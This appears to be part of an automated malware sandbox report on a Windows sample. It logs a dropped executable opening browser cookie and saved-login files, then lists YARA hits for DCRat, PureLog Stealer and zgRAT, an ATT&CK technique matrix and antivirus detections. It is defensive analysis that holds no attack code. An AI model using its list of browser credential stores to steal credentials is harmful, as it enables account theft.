Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000004.00000002.1932393224.0000000013164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: driverInto.exe PID: 5936, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1783939727.0000000000AC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1622104471.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Registration\csrss.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match	File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Registration\csrss.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	1 Native API	11 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	146 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	231 Security Software Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	133 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	141 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	11 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Vqzx4PFehn.exe	61%	ReversingLabs	Win32.Trojan.Uztuby
Vqzx4PFehn.exe	70%	Virustotal		Browse
Vqzx4PFehn.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\uCFUtfTN.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\Desktop\fJkHwTWu.log	100%	Avira	HEUR/AGEN.1300079
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Windows Defender\services.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\nntxgNlb.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\EqkKdrOv.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\28moAYly7n.bat	100%	Avira	BAT/Delbat.C
C:\Windows\Registration\csrss.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	100%	Joe Sandbox ML
